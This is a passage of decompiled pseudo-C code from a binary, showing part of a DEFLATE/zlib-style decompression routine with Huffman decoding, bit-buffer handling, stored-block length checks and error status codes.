																								__eflags = _t918;
																								if(_t918 != 0) {
																									L155:
																									do {
																										L156:
																										 *(_t1066 - 0x2c) =  *(_t1066 - 0x2c) >> 1;
																										_t798 =  *(_t1066 - 0x24) - 1;
																										_t1012 = _t1012 + _t1012 |  *(_t1066 - 0x2c) & 0x00000001;
																										 *(_t1066 - 0x24) = _t798;
																										__eflags = _t798;
																									} while (_t798 != 0);
																									_t918 =  *(_t1066 - 0x44);
																								}
																								L158:
																								__eflags = _t918 - 0xa;
																								if(_t918 > 0xa) {
																									L164:
																									_t782 =  *(_t1066 - 0xc) + 0x120 + (_t1012 & 0x000003ff) * 2;
																									_t846 =  *(_t1066 - 0x30);
																									 *(_t1066 - 0x44) = _t782;
																									_t783 =  *_t782;
																									 *(_t1066 - 0x2c) = _t783;
																									__eflags = _t783;
																									if(_t783 == 0) {
																										 *( *(_t1066 - 0x44)) = _t846;
																										_t783 = _t846;
																										_t846 = _t846 - 2;
																										__eflags = _t846;
																										 *(_t1066 - 0x2c) = _t783;
																										 *(_t1066 - 0x30) = _t846;
																									}
																									L166:
																									_t1020 = _t1012 >> 9;
																									__eflags = _t918 - 0xb;
																									if(_t918 > 0xb) {
																										L167:
																										_t919 = _t918 + 0xfffffff5;
																										__eflags = _t919;
																										 *(_t1066 - 0x24) = _t919;
																										_t920 =  *(_t1066 - 0x2c);
																										do {
																											L168:
																											_t1020 = _t1020 >> 1;
																											_t788 = 0x48f - _t920 - (_t1020 & 0x00000001);
																											_t923 =  *( *(_t1066 - 0xc) + 0x91e) & 0x0000ffff;
																											__eflags = _t923;
																											if(_t923 != 0) {
																												_t920 = _t923;
																											} else {
																												 *( *(_t1066 - 0xc) + _t788 * 2) = _t846;
																												_t789 =  *(_t1066 - 0x30);
																												_t920 = _t789;
																												_t790 = _t789 - 2;
																												 *(_t1066 - 0x30) = _t790;
																												_t846 = _t790;
																											}
																											L171:
																											_t361 = _t1066 - 0x24;
																											 *_t361 =  *(_t1066 - 0x24) - 1;
																											__eflags =  *_t361;
																										} while ( *_t361 != 0);
																										 *(_t1066 - 0x2c) = _t920;
																										_t783 = _t920;
																									}
																									L173:
																									_t1012 = (_t1020 >> 0x00000001 & 0x00000001) - _t783;
																									__eflags = _t1012;
																									 *( *(_t1066 - 0xc) + 0x91e + _t1012 * 2) = _t1065;
																								} else {
																									L159:
																									_t795 = (_t918 << 0x00000009 | _t1065) & 0x0000ffff;
																									 *(_t1066 - 0x44) = _t795;
																									__eflags = _t1012 - 0x400;
																									if(_t1012 < 0x400) {
																										L160:
																										goto 0x5a1401;
																										asm("int3");
																										asm("int3");
																										asm("int3");
																										L161:
																										_t796 = _t795 << _t918;
																										 *(_t1066 - 0x4c) = _t796 + _t796;
																										_t928 =  *(_t1066 - 0xc) + _t1012 * 2 + 0x120;
																										__eflags = _t928;
																										do {
																											L162:
																											 *_t928 = _t1029;
																											_t1012 = _t1012 + _t796;
																											_t928 = _t928 +  *(_t1066 - 0x4c);
																											__eflags = _t1012 - 0x400;
																										} while (_t1012 < 0x400);
																										_t1029 =  *(_t1066 - 0x14);
																									}
																								}
																							}
																							L174:
																							_t741 =  *(_t1029 + 0x18);
																							_t1065 = _t1065 + 1;
																							__eflags = _t1065 -  *((intOrPtr*)(_t1029 + 0x2c + _t741 * 4));
																						} while (_t1065 <  *((intOrPtr*)(_t1029 + 0x2c + _t741 * 4)));
																						goto 0x5a1417;
																						asm("int3");
																					}
																					L176:
																					__eflags =  *(_t1029 + 0x18) - 2;
																					if( *(_t1029 + 0x18) != 2) {
																						L217:
																						 *(_t1029 + 0x18) =  *(_t1029 + 0x18) - 1;
																						continue;
																					} else {
																						L177:
																						_t907 = 0;
																						__eflags = 0;
																						while(1) {
																							L178:
																							_t1013 =  *(_t1066 - 4);
																							while(1) {
																								L179:
																								 *(_t1066 - 8) = _t907;
																								__eflags = _t907 -  *(_t1029 + 0x30) +  *(_t1029 + 0x2c);
																								if(_t907 >=  *(_t1029 + 0x30) +  *(_t1029 + 0x2c)) {
																									break;
																								}
																								L180:
																								__eflags = _t1065 - 0xf;
																								if(_t1065 >= 0xf) {
																									L197:
																									_t756 =  *((short*)(_t1029 + 0x1ca0 + (_t1013 & 0x000003ff) * 2));
																									 *(_t1066 - 0x28) = _t756;
																									__eflags = _t756;
																									if(_t756 < 0) {
																										L199:
																										L200:
																										do {
																											L201:
																											 *(_t1066 - 0x28) =  !( *(_t1066 - 0x28));
																											_t758 = _t1013 >> _t907;
																											_t907 = _t907 + 1;
																											_t595 =  *((short*)(_t1029 + 0x24a0 + ((_t758 & 0x00000001) +  *(_t1066 - 0x28)) * 2));
																											 *(_t1066 - 0x28) = _t595;
																											__eflags = _t595;
																										} while (_t595 < 0);
																									} else {
																										L198:
																										_t907 = _t756 >> 9;
																										_t595 = _t756 & 0x000001ff;
																										 *(_t1066 - 0x28) = _t595;
																									}
																									L202:
																									_t1013 = _t1013 >> _t907;
																									_t1050 = _t1065 - _t907;
																									 *(_t1066 - 4) = _t1013;
																									 *(_t1066 - 0x1c) = _t1050;
																									__eflags = _t595 - 0x10;
																									if(__eflags >= 0) {
																										L204:
																										if(__eflags != 0) {
																											L207:
																											_t908 =  *((char*)(_t595 + 0x2b0ff0));
																											 *(_t1066 - 0x38) = _t908;
																											__eflags = _t1050 - _t908;
																											if(_t1050 >= _t908) {
																												L211:
																												_t1050 = _t1050 - _t908;
																												 *(_t1066 - 0x1c) = _t1050;
																												_t909 =  *(_t1066 - 0x14);
																												_t1039 = ((0x00000001 << _t908) - 0x00000001 & _t1013) +  *((char*)(_t595 + 0x2b0ff8));
																												__eflags =  *(_t1066 - 0x28) - 0x10;
																												_t762 =  *(_t1066 - 8);
																												 *(_t1066 - 4) = _t1013 >> _t908;
																												if( *(_t1066 - 0x28) != 0x10) {
																													_t1016 = 0;
																													__eflags = 0;
																												} else {
																													_t1016 =  *(_t762 + _t909 + 0x2923) & 0x000000ff;
																												}
																												L214:
																												memset(_t762 + _t909 + 0x2924, _t1016, _t1039);
																												_t1068 = _t1068 + 0xc;
																												_t907 =  *(_t1066 - 8) + _t1039;
																												_t1029 =  *(_t1066 - 0x14);
																												L178:
																												_t1013 =  *(_t1066 - 4);
																												continue;
																											} else {
																												while(1) {
																													L208:
																													__eflags = _t846 -  *(_t1066 - 0x20);
																													if(_t846 >=  *(_t1066 - 0x20)) {
																														break;
																													}
																													L209:
																													_t595 = ( *_t846 & 0x000000ff) << _t1050;
																													_t846 = _t846 + 1;
																													_t908 =  *(_t1066 - 0x38);
																													_t1013 = _t1013 | _t595;
																													_t1050 = _t1050 + 8;
																													 *(_t1066 - 0x18) = _t846;
																													 *(_t1066 - 4) = _t1013;
																													__eflags = _t1050 - _t908;
																													if(_t1050 < _t908) {
																														continue;
																													} else {
																														L210:
																														_t595 =  *(_t1066 - 0x28);
																														goto L211;
																													}
																													goto L295;
																												}
																												L251:
																												 *_t1029 = 0x12;
																												goto L285;
																											}
																										} else {
																											L205:
																											_t766 =  *(_t1066 - 8);
																											__eflags = _t766;
																											if(_t766 == 0) {
																												L268:
																												_t684 = _t766 | 0xffffffff;
																												 *_t1029 = 0x11;
																												goto L291;
																											} else {
																												L206:
																												_t595 =  *(_t1066 - 0x28);
																												goto L207;
																											}
																										}
																									} else {
																										L203:
																										_t913 =  *(_t1066 - 8);
																										 *(_t1029 + 0x2924 + _t913) = _t595;
																										_t907 = _t913 + 1;
																										continue;
																									}
																								} else {
																									L181:
																									__eflags =  *(_t1066 - 0x20) - _t846 - 2;
																									if( *(_t1066 - 0x20) - _t846 >= 2) {
																										L195:
																										_t1017 =  *(_t846 + 1) & 0x000000ff;
																										_t769 =  *_t846 & 0x000000ff;
																										_t846 = _t846 + 2;
																										_t907 = _t1065;
																										 *(_t1066 - 0x18) = _t846;
																										 *(_t1066 - 4) =  *(_t1066 - 4) | _t1017 << _t1065 + 0x00000008 | _t769 << _t907;
																										_t1065 = _t1065 + 0x10;
																										__eflags = _t1065;
																										_t1013 =  *(_t1066 - 4);
																										goto L196;
																									} else {
																										do {
																											L182:
																											_t595 = _t1013 & 0x000003ff;
																											_t1040 =  *((short*)(_t1029 + 0x1ca0 + _t595 * 2));
																											__eflags = _t1040;
																											if(_t1040 < 0) {
																												L186:
																												__eflags = _t1065 - 0xa;
																												if(_t1065 <= 0xa) {
																													goto L191;
																												} else {
																													L187:
																													L188:
																													 *(_t1066 - 0x24) = _t907;
																													while(1) {
																														L189:
																														_t1040 =  *((short*)( *(_t1066 - 0x14) + 0x24a0 + ((_t1013 >> _t907 & 0x00000001) +  !_t1040) * 2));
																														_t907 =  *(_t1066 - 0x24) + 1;
																														 *(_t1066 - 0x24) = _t907;
																														__eflags = _t1040;
																														if(_t1040 >= 0) {
																															goto L196;
																														}
																														L190:
																														_t595 = _t907 + 1;
																														__eflags = _t1065 - _t595;
																														if(_t1065 >= _t595) {
																															continue;
																														} else {
																															goto L191;
																														}
																														goto L295;
																													}
																													goto L196;
																												}
																											} else {
																												L183:
																												_t1042 = _t1040 >> 9;
																												__eflags = _t1042;
																												if(_t1042 == 0) {
																													L191:
																													_t1029 =  *(_t1066 - 0x14);
																													L192:
																													__eflags = _t846 -  *(_t1066 - 0x20);
																													if(_t846 >=  *(_t1066 - 0x20)) {
																														L250:
																														 *_t1029 = 0x10;
																														goto L285;
																													} else {
																														goto L193;
																													}
																												} else {
																													L184:
																													__eflags = _t1065 - _t1042;
																													if(_t1065 >= _t1042) {
																														L196:
																														_t1029 =  *(_t1066 - 0x14);
																														goto L197;
																													} else {
																														L185:
																														goto L191;
																													}
																												}
																											}
																											goto L295;
																											L193:
																											_t907 = _t1065;
																											_t773 = ( *_t846 & 0x000000ff) << _t907;
																											_t846 = _t846 + 1;
																											_t1013 = _t1013 | _t773;
																											 *(_t1066 - 0x18) = _t846;
																											_t1065 = _t1065 + 8;
																											 *(_t1066 - 4) = _t1013;
																											__eflags = _t1065 - 0xf;
																										} while (_t1065 < 0xf);
																										goto L197;
																									}
																								}
																								goto L295;
																							}
																							L215:
																							_t1014 =  *(_t1029 + 0x2c);
																							_t745 =  *(_t1029 + 0x30) + _t1014;
																							__eflags = _t745 - _t907;
																							if(_t745 != _t907) {
																								L269:
																								_t684 = _t745 | 0xffffffff;
																								 *_t1029 = 0x15;
																								goto L291;
																							} else {
																								L216:
																								memcpy(_t1029 + 0x40, _t1029 + 0x2924, _t1014);
																								_t751 =  *(_t1029 + 0x2c) + 0x2924 + _t1029;
																								__eflags = _t751;
																								memcpy(_t1029 + 0xde0, _t751,  *(_t1029 + 0x30));
																								_t1068 = _t1068 + 0x18;
																								goto L217;
																							}
																							goto L295;
																						}
																					}
																				} else {
																					L149:
																					__eflags = _t906 - 1;
																					if(_t906 > 1) {
																						L267:
																						 *(_t1066 - 0xc) = 0xffffffff;
																						 *_t1029 = 0x23;
																						goto L292;
																					} else {
																						goto L150;
																					}
																				}
																				goto L295;
																			}
																			L218:
																			_t988 =  *(_t1066 - 4);
																			while(1) {
																				L38:
																				_t883 =  *(_t1066 - 0x20) - _t846;
																				__eflags = _t883 - 4;
																				if(_t883 < 4) {
																					goto L57;
																				}
																				goto L39;
																			}
																			goto L57;
																		}
																	}
																} else {
																	L89:
																	_t595 = _t1050 & 0x00000007;
																	__eflags = _t1050 - _t595;
																	if(_t1050 >= _t595) {
																		L92:
																		_t940 = _t1050 & 0x00000007;
																		_t987 = _t997 >> _t940;
																		_t1050 = _t1050 - _t940;
																		 *(_t1066 - 4) = _t987;
																		_t941 = 0;
																		__eflags = 0;
																		while(1) {
																			L93:
																			 *(_t1066 - 8) = _t941;
																			__eflags = _t941 - 4;
																			if(_t941 >= 4) {
																				break;
																			}
																			L94:
																			__eflags = _t1050;
																			if(_t1050 == 0) {
																				L100:
																				__eflags = _t846 -  *(_t1066 - 0x20);
																				if(_t846 >=  *(_t1066 - 0x20)) {
																					L244:
																					 *_t1029 = 7;
																					goto L285;
																				} else {
																					L101:
																					_t595 =  *_t846;
																					_t846 = _t846 + 1;
																					(_t1029 + 0x2920)[_t941] = _t595;
																					_t941 = _t941 + 1;
																					 *(_t1066 - 0x18) = _t846;
																					continue;
																				}
																			} else {
																				L95:
																				__eflags = _t1050 - 8;
																				if(_t1050 >= 8) {
																					L99:
																					(_t1029 + 0x2920)[_t941] = _t987;
																					_t1050 = _t1050 - 8;
																					_t987 = _t987 >> 8;
																					_t941 = _t941 + 1;
																					 *(_t1066 - 4) = _t987;
																					continue;
																				} else {
																					while(1) {
																						L96:
																						__eflags = _t846 -  *(_t1066 - 0x20);
																						if(_t846 >=  *(_t1066 - 0x20)) {
																							break;
																						}
																						L97:
																						_t595 = ( *_t846 & 0x000000ff) << _t1050;
																						_t846 = _t846 + 1;
																						_t987 = _t987 | _t595;
																						 *(_t1066 - 0x18) = _t846;
																						_t1050 = _t1050 + 8;
																						 *(_t1066 - 4) = _t987;
																						__eflags = _t1050 - 8;
																						if(_t1050 < 8) {
																							continue;
																						} else {
																							L98:
																							_t941 =  *(_t1066 - 8);
																							goto L99;
																						}
																						goto L295;
																					}
																					L243:
																					 *_t1029 = 6;
																					goto L285;
																				}
																			}
																			goto L295;
																		}
																		L102:
																		_t595 =  *(_t1029 + 0x2922) & 0x000000ff;
																		 *(_t1066 - 8) = ( *(_t1029 + 0x2921) & 0x000000ff) << 0x00000008 |  *(_t1029 + 0x2920) & 0x000000ff;
																		__eflags =  *(_t1066 - 8) - ((( *(_t1029 + 0x2923) & 0x000000ff) << 0x00000008 | _t595) ^ 0x0000ffff);
																		if( *(_t1066 - 8) != ((( *(_t1029 + 0x2923) & 0x000000ff) << 0x00000008 | _t595) ^ 0x0000ffff)) {
																			L265:
																			 *(_t1066 - 0xc) = 0xffffffff;
																			 *_t1029 = 0x27;
																			goto L292;
																		} else {
																			L103:
																			_t949 =  *(_t1066 - 8);
																			while(1) {
																				L104:
																				__eflags = _t949;
																				if(_t949 == 0) {
																					goto L84;
																				}
																				L105:
																				__eflags = _t1050;
																				if(_t1050 == 0) {
																					L112:
																					_t595 =  *(_t1066 - 0x10);
																					while(1) {
																						L113:
																						__eflags = _t949;
																						if(_t949 == 0) {
																							break;
																						}
																						L115:
																						_t1025 =  *((intOrPtr*)(_t1066 - 0x40));
																						__eflags = _t595 - _t1025;
																						if(_t595 < _t1025) {
																							L117:
																							_t595 =  *(_t1066 - 0x20);
																							__eflags = _t846 - _t595;
																							if(_t846 >= _t595) {
																								L247:
																								_t1029 =  *(_t1066 - 0x14);
																								 *_t1029 = 0x26;
																								goto L285;
																							} else {
																								L118:
																								_t987 = _t1025 -  *(_t1066 - 0x10);
																								_t1047 = _t595 - _t846;
																								__eflags = _t987 - _t1047;
																								_t817 =  <  ? _t987 : _t1047;
																								__eflags = ( <  ? _t987 : _t1047) - _t949;
																								if(( <  ? _t987 : _t1047) >= _t949) {
																									_t1029 = _t949;
																								} else {
																									__eflags = _t987 - _t1047;
																									_t1029 =  <  ? _t987 : _t1047;
																								}
																								L121:
																								L122:
																								memcpy();
																								_t846 = _t846 + _t1029;
																								_t595 =  *(_t1066 - 0x10) + _t1029;
																								_t1068 = _t1068 + 0xc;
																								 *(_t1066 - 0x18) = _t846;
																								_t949 =  *(_t1066 - 8) - _t1029;
																								 *(_t1066 - 0x10) = _t595;
																								 *(_t1066 - 8) = _t949;
																								continue;
																							}
																						} else {
																							L116:
																							_t1029 =  *(_t1066 - 0x14);
																							 *(_t1066 - 0xc) = 2;
																							 *_t1029 = 9;
																							goto L292;
																						}
																						goto L295;
																					}
																					L114:
																					goto 0x5a1388;
																					asm("int3");
																					goto L84;
																				} else {
																					L106:
																					__eflags = _t1050 - 8;
																					if(_t1050 >= 8) {
																						L109:
																						_t595 = _t987 & 0x000000ff;
																						_t987 = _t987 >> 8;
																						_t1050 = _t1050 - 8;
																						 *(_t1066 - 0x28) = _t595;
																						 *(_t1066 - 4) = _t987;
																						L110:
																						__eflags =  *(_t1066 - 0x10) -  *((intOrPtr*)(_t1066 - 0x40));
																						_t1029 =  *(_t1066 - 0x14);
																						if( *(_t1066 - 0x10) >=  *((intOrPtr*)(_t1066 - 0x40))) {
																							L246:
																							 *(_t1066 - 0xc) = 2;
																							 *_t1029 = 0x34;
																							goto L292;
																						} else {
																							L111:
																							 *(_t1066 - 0x10) =  *(_t1066 - 0x10) + 1;
																							 *( *(_t1066 - 0x10)) = _t595;
																							_t949 =  *(_t1066 - 8) - 1;
																							 *(_t1066 - 8) = _t949;
																							continue;
																						}
																					} else {
																						while(1) {
																							L107:
																							__eflags = _t846 -  *(_t1066 - 0x20);
																							if(_t846 >=  *(_t1066 - 0x20)) {
																								break;
																							}
																							L108:
																							_t595 = ( *_t846 & 0x000000ff) << _t1050;
																							_t846 = _t846 + 1;
																							_t987 = _t987 | _t595;
																							 *(_t1066 - 0x18) = _t846;
																							_t1050 = _t1050 + 8;
																							 *(_t1066 - 4) = _t987;
																							__eflags = _t1050 - 8;
																							if(_t1050 < 8) {
																								continue;
																							} else {
																								goto L109;
																							}
																							goto L295;
																						}
																						L245:
																						 *_t1029 = 0x33;
																						goto L285;
																					}
																				}
																				goto L295;
																			}
																			continue;
																		}
																	} else {
																		while(1) {
																			L90:
																			__eflags = _t846 -  *(_t1066 - 0x20);
																			if(_t846 >=  *(_t1066 - 0x20)) {
																				break;
																			}
																			L91:
																			_t823 = ( *_t846 & 0x000000ff) << _t1050;
																			_t1050 = _t1050 + 8;
																			_t997 = _t997 | _t823;
																			_t846 = _t846 + 1;
																			 *(_t1066 - 0x18) = _t846;
																			_t595 = _t1050 & 0x00000007;
																			 *(_t1066 - 4) = _t997;
																			__eflags = _t1050 - _t595;
																			if(_t1050 < _t595) {
																				continue;
																			} else {
																				goto L92;
																			}
																			goto L295;
																		}
																		L242:
																		 *_t1029 = 5;
																		goto L285;
																	}
																}
															} else {
																while(1) {
																	L86:
																	__eflags = _t846 -  *(_t1066 - 0x20);
																	if(_t846 >=  *(_t1066 - 0x20)) {
																		break;
																	}
																	L87:
																	_t595 = ( *_t846 & 0x000000ff) << _t1064;
																	_t846 = _t846 + 1;
																	_t987 = _t987 | _t595;
																	 *(_t1066 - 0x18) = _t846;
																	_t1050 = _t1064 + 8;
																	 *(_t1066 - 4) = _t987;
																	__eflags = _t1050 - 3;
																	if(_t1050 < 3) {
																		continue;
																	} else {
																		goto L88;
																	}
																	goto L295;
																}
																L241:
																 *_t1029 = 3;
																goto L285;
															}
															goto L295;
														}
														L252:
														_t595 = _t1064 & 0x00000007;
														__eflags = _t1064 - _t595;
														if(_t1064 >= _t595) {
															L256:
															_t683 =  *(_t1066 - 0x3c);
															_t890 = _t1064 & 0x00000007;
															_t992 = _t987 >> _t890;
															_t1050 = _t1064 - _t890;
															 *(_t1066 - 4) = _t992;
															__eflags = _t846 - _t683;
															if(_t846 > _t683) {
																while(1) {
																	L257:
																	__eflags = _t1050 - 8;
																	if(_t1050 < 8) {
																		goto L259;
																	}
																	L258:
																	_t846 = _t846 - 1;
																	_t1050 = _t1050 - 8;
																	__eflags = _t846 - _t683;
																	if(_t846 > _t683) {
																		continue;
																	}
																	goto L259;
																}
															}
															L259:
															L260:
															_t595 = _t1050;
															asm("bts edx, eax");
															__eflags = _t595 - 0x20;
															_t892 =  >=  ? _t992 : 0;
															_t993 = _t992 ^ _t892;
															__eflags = _t595 - 0x40;
															_t893 =  >=  ? _t993 : _t892;
															 *(_t1066 - 4) =  *(_t1066 - 4) & _t993 - 0x00000001;
															__eflags =  *(_t1066 + 0x18) & 0x00000001;
															if(( *(_t1066 + 0x18) & 0x00000001) == 0) {
																L290:
																_t684 = 0;
																__eflags = 0;
																 *_t1029 = 0x22;
																goto L291;
															} else {
																L261:
																_t894 = 0;
																while(1) {
																	L277:
																	 *(_t1066 - 8) = _t894;
																	__eflags = _t894 - 4;
																	if(_t894 >= 4) {
																		goto L290;
																	}
																	L278:
																	__eflags = _t1050;
																	if(_t1050 != 0) {
																		L281:
																		_t995 =  *(_t1066 - 4);
																		__eflags = _t1050 - 8;
																		if(_t1050 >= 8) {
																			L275:
																			_t685 = _t995 & 0x000000ff;
																			_t1050 = _t1050 - 8;
																			__eflags = _t1050;
																			 *(_t1066 - 4) = _t995 >> 8;
																			goto L276;
																		} else {
																			L282:
																			while(1) {
																				L272:
																				__eflags = _t846 -  *(_t1066 - 0x20);
																				if(_t846 >=  *(_t1066 - 0x20)) {
																					break;
																				}
																				L273:
																				_t595 = ( *_t846 & 0x000000ff) << _t1050;
																				_t1050 = _t1050 + 8;
																				_t995 = _t995 | _t595;
																				_t846 = _t846 + 1;
																				 *(_t1066 - 4) = _t995;
																				__eflags = _t1050 - 8;
																				if(_t1050 < 8) {
																					continue;
																				} else {
																					L274:
																					_t894 =  *(_t1066 - 8);
																					goto L275;
																				}
																				goto L295;
																			}
																			L284:
																			 *_t1029 = 0x29;
																			goto L285;
																		}
																	} else {
																		L279:
																		__eflags = _t846 -  *(_t1066 - 0x20);
																		if(_t846 >=  *(_t1066 - 0x20)) {
																			L283:
																			 *_t1029 = 0x2a;
																			goto L285;
																		} else {
																			L280:
																			_t685 =  *_t846 & 0x000000ff;
																			_t846 = _t846 + 1;
																			L276:
																			 *(_t1066 - 0x24) = _t685;
																			_t595 =  *(_t1029 + 0x10) << 0x00000008 |  *(_t1066 - 0x24);
																			_t894 = _t894 + 1;
																			__eflags = _t894;
																			 *(_t1029 + 0x10) = _t595;
																			continue;
																		}
																	}
																	goto L295;
																}
																goto L290;
															}
														} else {
															L253:
															while(1) {
																L254:
																__eflags = _t846 -  *(_t1066 - 0x20);
																if(_t846 >=  *(_t1066 - 0x20)) {
																	break;
																}
																L255:
																_t1050 = _t1064 + 8;
																_t987 = _t987 | ( *_t846 & 0x000000ff) << _t1064;
																_t846 = _t846 + 1;
																 *(_t1066 - 4) = _t987;
																_t595 = _t1050 & 0x00000007;
																__eflags = _t1050 - _t595;
																if(_t1050 < _t595) {
																	continue;
																} else {
																	goto L256;
																}
																goto L295;
															}
															L271:
															 *_t1029 = 0x20;
															goto L285;
														}
													}
												} else {
													L48:
													__eflags = _t1064 - 0xf;
													if(_t1064 < 0xf) {
														_t1006 =  *(_t846 + 1) & 0x000000ff;
														_t884 = _t1064;
														_t723 =  *_t846 & 0x000000ff;
														_t846 = _t846 + 2;
														_t1029 =  *(_t1066 - 0x14);
														 *(_t1066 - 0x18) = _t846;
														 *(_t1066 - 4) =  *(_t1066 - 4) | (_t1006 << 0x00000008 | _t723) << _t884;
														_t1064 = _t1064 + 0x10;
														__eflags = _t1064;
														_t987 =  *(_t1066 - 4);
													}
													_t716 =  *((short*)(_t1029 + 0x160 + (_t987 & 0x000003ff) * 2));
													 *(_t1066 - 0x1c) = _t716;
													__eflags = _t716;
													if(_t716 < 0) {
														L52:
														goto 0x5a1349;
														asm("int3");
														asm("int3");
														asm("int3");
														do {
															L53:
															_t718 = _t987 >> _t884;
															_t884 = _t884 + 1;
															_t846 =  *((short*)(_t1029 + 0x960 + ((_t718 & 0x00000001) +  !_t846) * 2));
															__eflags = _t846;
														} while (_t846 < 0);
														 *(_t1066 - 0x1c) = _t846;
														_t846 =  *(_t1066 - 0x18);
													} else {
														L51:
														_t884 = _t716 >> 9;
													}
													L55:
													_t595 =  *(_t1066 - 8);
													_t1064 = _t1064 - _t884;
													_t987 = _t987 >> _t884;
													 *(_t1066 - 4) = _t987;
													 *( *(_t1066 - 0x10)) = _t595;
													_t884 =  *(_t1066 - 0x1c);
													__eflags = _t884 & 0x00000100;
													if((_t884 & 0x00000100) != 0) {
														L82:
														_t168 = _t1066 - 0x10;
														 *_t168 =  *(_t1066 - 0x10) + 1;
														__eflags =  *_t168;
														goto L83;
													} else {
														L56:
														_t721 =  *(_t1066 - 0x10);
														 *(_t721 + 1) = _t884;
														 *(_t1066 - 0x10) = _t721 + 2;
														while(1) {
															L38:
															_t883 =  *(_t1066 - 0x20) - _t846;
															__eflags = _t883 - 4;
															if(_t883 < 4) {
																goto L57;
															}
															goto L39;
														}
													}
												}
											}
											goto L295;
											L57:
											__eflags = _t1050 - 0xf;
											if(_t1050 >= 0xf) {
												L74:
												_t669 =  *((short*)(_t1029 + 0x160 + (_t988 & 0x000003ff) * 2));
												 *(_t1066 - 8) = _t669;
												__eflags = _t669;
												if(_t669 < 0) {
													L76:
													goto 0x5a1372;
													asm("int3");
													asm("int3");
													asm("int3");
													do {
														L77:
														_t671 = _t988 >> _t883;
														_t883 = _t883 + 1;
														_t595 = (_t671 & 0x00000001) +  !_t846;
														_t846 =  *((short*)(_t1029 + 0x960 + _t595 * 2));
														__eflags = _t846;
													} while (_t846 < 0);
													 *(_t1066 - 8) = _t846;
													_t846 =  *(_t1066 - 0x18);
												} else {
													L75:
													_t883 = _t669 >> 9;
													_t595 = _t669 & 0x000001ff;
													 *(_t1066 - 8) = _t595;
												}
												L79:
												_t987 = _t988 >> _t883;
												_t1064 = _t1050 - _t883;
												_t884 =  *(_t1066 - 8);
												 *(_t1066 - 4) = _t987;
												__eflags = _t884 - 0x100;
												if(_t884 >= 0x100) {
													goto L83;
												} else {
													L80:
													_t825 =  *(_t1066 - 0x10);
													__eflags = _t825 -  *((intOrPtr*)(_t1066 - 0x40));
													if(_t825 >=  *((intOrPtr*)(_t1066 - 0x40))) {
														L240:
														 *(_t1066 - 0xc) = 2;
														 *_t1029 = 0x18;
														goto L292;
													} else {
														L81:
														 *_t825 = _t884;
														 *(_t1066 - 0x10) = _t825 + 1;
														continue;
													}
												}
											} else {
												L58:
												__eflags = _t883 - 2;
												if(_t883 >= 2) {
													L72:
													_t999 =  *(_t846 + 1) & 0x000000ff;
													_t697 =  *_t846 & 0x000000ff;
													_t846 = _t846 + 2;
													_t883 = _t1050;
													 *(_t1066 - 0x18) = _t846;
													 *(_t1066 - 4) =  *(_t1066 - 4) | _t999 << _t1050 + 0x00000008 | _t697 << _t883;
													_t1050 = _t1050 + 0x10;
													__eflags = _t1050;
													_t988 =  *(_t1066 - 4);
													goto L73;
												} else {
													do {
														L59:
														_t595 = _t988 & 0x000003ff;
														_t1032 =  *((short*)(_t1029 + 0x160 + _t595 * 2));
														__eflags = _t1032;
														if(_t1032 < 0) {
															L63:
															__eflags = _t1050 - 0xa;
															if(_t1050 <= 0xa) {
																goto L68;
															} else {
																L64:
																 *(_t1066 - 0x1c) = _t883;
																while(1) {
																	L66:
																	_t1032 =  *((short*)( *(_t1066 - 0x14) + 0x960 + ((_t988 >> _t883 & 0x00000001) +  !_t1032) * 2));
																	_t883 =  *(_t1066 - 0x1c) + 1;
																	 *(_t1066 - 0x1c) = _t883;
																	__eflags = _t1032;
																	if(_t1032 >= 0) {
																		goto L73;
																	}
																	L67:
																	_t595 = _t883 + 1;
																	__eflags = _t1050 - _t595;
																	if(_t1050 >= _t595) {
																		continue;
																	} else {
																		goto L68;
																	}
																	goto L295;
																}
																goto L73;
															}
														} else {
															L60:
															_t1034 = _t1032 >> 9;
															__eflags = _t1034;
															if(_t1034 == 0) {
																L68:
																_t1029 =  *(_t1066 - 0x14);
																L69:
																__eflags = _t846 -  *(_t1066 - 0x20);
																if(_t846 >=  *(_t1066 - 0x20)) {
																	L239:
																	 *_t1029 = 0x17;
																	goto L285;
																} else {
																	goto L70;
																}
															} else {
																L61:
																__eflags = _t1050 - _t1034;
																if(_t1050 >= _t1034) {
																	L73:
																	_t1029 =  *(_t1066 - 0x14);
																	goto L74;
																} else {
																	L62:
																	goto L68;
																}
															}
														}
														goto L295;
														L70:
														_t883 = _t1050;
														_t701 = ( *_t846 & 0x000000ff) << _t883;
														_t846 = _t846 + 1;
														_t988 = _t988 | _t701;
														 *(_t1066 - 0x18) = _t846;
														_t1050 = _t1050 + 8;
														 *(_t1066 - 4) = _t988;
														__eflags = _t1050 - 0xf;
													} while (_t1050 < 0xf);
													goto L74;
												}
											}
											goto L295;
										}
									}
								} else {
									L270:
									_t684 = _t595 | 0xffffffff;
									 *_t1029 = 0x25;
									L291:
									 *(_t1066 - 0xc) = _t684;
									goto L292;
								}
							} else {
								L9:
								if(_t1050 >= _t875) {
									L12:
									_t1050 = _t1050 - _t875;
									_t842 = (_t595 << _t875) - 0x00000001 & _t988;
									_t988 = _t988 >> _t875;
									 *(_t1066 - 0x28) =  *(_t1066 - 0x28) + _t842;
									_t595 =  *(_t1066 - 0x28);
									 *(_t1066 - 4) = _t988;
									goto L14;
								} else {
									L10:
									while(_t846 <  *(_t1066 - 0x20)) {
										_t595 = ( *_t846 & 0x000000ff) << _t1050;
										_t846 = _t846 + 1;
										_t875 =  *(_t1066 - 0x38);
										_t988 = _t988 | _t595;
										_t1050 = _t1050 + 8;
										 *(_t1066 - 0x18) = _t846;
										 *(_t1066 - 4) = _t988;
										if(_t1050 < _t875) {
											continue;
										} else {
											goto L12;
										}
										goto L295;
									}
									 *_t1029 = 0x1b;
									L285:
									__eflags =  *(_t1066 + 0x18) & 0x00000002;
									L286:
									L287:
									_t596 =  !=  ? 1 : _t595;
									 *(_t1066 - 0xc) = _t596;
									__eflags = _t596 - 1;
									if(_t596 != 1) {
										L288:
										__eflags = _t596 - 0xfffffffc;
										if(_t596 != 0xfffffffc) {
											L289:
											L292:
											_t641 =  *(_t1066 - 0x3c);
											__eflags = _t846 - _t641;
											if(_t846 > _t641) {
												while(1) {
													L293:
													__eflags = _t1050 - 8;
													if(_t1050 < 8) {
														goto L295;
													}
													L294:
													_t846 = _t846 - 1;
													_t1050 = _t1050 - 8;
													__eflags = _t846 - _t641;
													if(_t846 > _t641) {
														continue;
													}
													goto L295;
												}
											}
										}
									}
								}
							}
							goto L295;
							L4:
							goto 0x5a12ba;
							asm("int3");
							asm("int3");
							asm("int3");
							do {
								L6:
								_t657 = _t987 >> _t872;
